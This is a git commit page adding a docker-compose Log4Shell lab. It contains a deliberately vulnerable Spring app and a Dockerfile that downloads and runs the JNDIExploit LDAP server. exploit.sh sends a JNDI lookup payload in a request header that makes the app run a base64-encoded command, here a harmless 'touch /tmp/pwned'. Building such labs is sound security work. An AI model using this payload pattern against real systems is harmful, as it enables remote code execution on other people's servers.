borekon/log4shell-vulnerable-app
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update to create a full lab environment with docker compose

Browse Source
This commit is contained in:
Daryl Robbins 2021-12-11 15:42:31 -05:00
parent 2414dc4300
commit 68e0adaa66
8 changed files with 77 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Dockerfile-exploit Normal file
View File

@ -0,0 +1,6 @@
FROM debian:stretch
EXPOSE 8080
ADD exploit.sh .
RUN apt-get -y update && apt-get -y install wait-for-it curl
CMD ["wait-for-it", "app:8080", "-t", "10", "--", "bash", "exploit.sh"]

6
Dockerfile-jndi Normal file
View File

@ -0,0 +1,6 @@
FROM openjdk:8u181-jdk-alpine
EXPOSE 8888
EXPOSE 1389
RUN mkdir /app
RUN cd /app && wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip && unzip JNDIExploit.v1.2.zip
CMD ["java", "-jar", "/app/JNDIExploit-1.2-SNAPSHOT.jar", "-i", "jndi", "-p", "8888"]

9
README.md
View File

@ -8,17 +8,12 @@ It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 1.
## Running the application ## Running the application
Run it: Run a complete security lab environment for log4shell:
```bash ```bash
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app docker-compose up
``` ```
Build it yourself (you don't need any Java-related tooling):
```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
``` ```
## Exploitation steps ## Exploitation steps

4
build.gradle
View File

@ -17,7 +17,9 @@ dependencies {
exclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging' exclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'
} }
implementation 'org.springframework.boot:spring-boot-starter-log4j2:2.6.1' implementation 'org.springframework.boot:spring-boot-starter-log4j2:2.6.1'
testImplementation 'org.springframework.boot:spring-boot-starter-test' // https://mvnrepository.com/artifact/log4j/log4j
implementation group: 'log4j', name: 'log4j', version: '1.2.16'
testImplementation 'org.springframework.boot:spring-boot-starter-test'
} }
test { test {

31
docker-compose.yml Normal file
View File

@ -0,0 +1,31 @@
version: "3.9" # optional since v1.27.0
services:
jndi:
build:
context: .
dockerfile: Dockerfile-jndi
ports:
- "8888:8888"
- "1389:1389"
app:
build: .
ports:
- "8080:8080"
volumes:
- tmp:/tmp
links:
- jndi
depends_on:
- jndi
exploit:
build:
context: .
dockerfile: Dockerfile-exploit
volumes:
- tmp:/tmp
depends_on:
- app
- jndi
volumes:
tmp:

12
exploit.sh Normal file
View File

@ -0,0 +1,12 @@
#!/bin/bash
curl app:8080 -H 'X-Api-Version: ${jndi:ldap://jndi:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
sleep 5
filename=/tmp/pwned
if [ -f "$filename" ];
then
echo "Regrettably, you've been pwned :("
echo "This configuration is vulnerable to log4shell"
else
echo "It looks like you're safe!"
fi

15
src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
View File

@ -1,6 +1,7 @@
package fr.christophetd.log4shell.vulnerableapp; package fr.christophetd.log4shell.vulnerableapp;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestHeader; import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RestController; import org.springframework.web.bind.annotation.RestController;
@ -11,12 +12,20 @@ import org.apache.logging.log4j.Logger;
@RestController @RestController
public class MainController { public class MainController {
private static final Logger logger = LogManager.getLogger("HelloWorld"); private static final org.apache.log4j.Logger logger1 = org.apache.log4j.Logger.getLogger("HelloWorld1");
private static final Logger logger2 = LogManager.getLogger("HelloWorld2");
@Value("${log4j.version:2}")
private String log4j_version;
@GetMapping("/") @GetMapping("/")
public String index(@RequestHeader("X-Api-Version") String apiVersion) { public String index(@RequestHeader("X-Api-Version") String apiVersion) {
logger.info("Received a request for API version " + apiVersion); if ("1".equals(log4j_version)) {
return "Hello, world!"; logger1.info("Hello from log4j v1 " + apiVersion);
} else {
logger2.info("Received a request for API version using log4j v2 " + apiVersion);
}
return "Hello, world!";
} }
} }

4
src/main/java/fr/christophetd/log4shell/vulnerableapp/VulnerableAppApplication.java
View File

@ -1,5 +1,6 @@
package fr.christophetd.log4shell.vulnerableapp; package fr.christophetd.log4shell.vulnerableapp;
import org.apache.log4j.BasicConfigurator;
import org.springframework.boot.SpringApplication; import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.boot.autoconfigure.SpringBootApplication;
@ -7,7 +8,8 @@ import org.springframework.boot.autoconfigure.SpringBootApplication;
public class VulnerableAppApplication { public class VulnerableAppApplication {
public static void main(String[] args) { public static void main(String[] args) {
SpringApplication.run(VulnerableAppApplication.class, args); BasicConfigurator.configure();
SpringApplication.run(VulnerableAppApplication.class, args);
} }
} }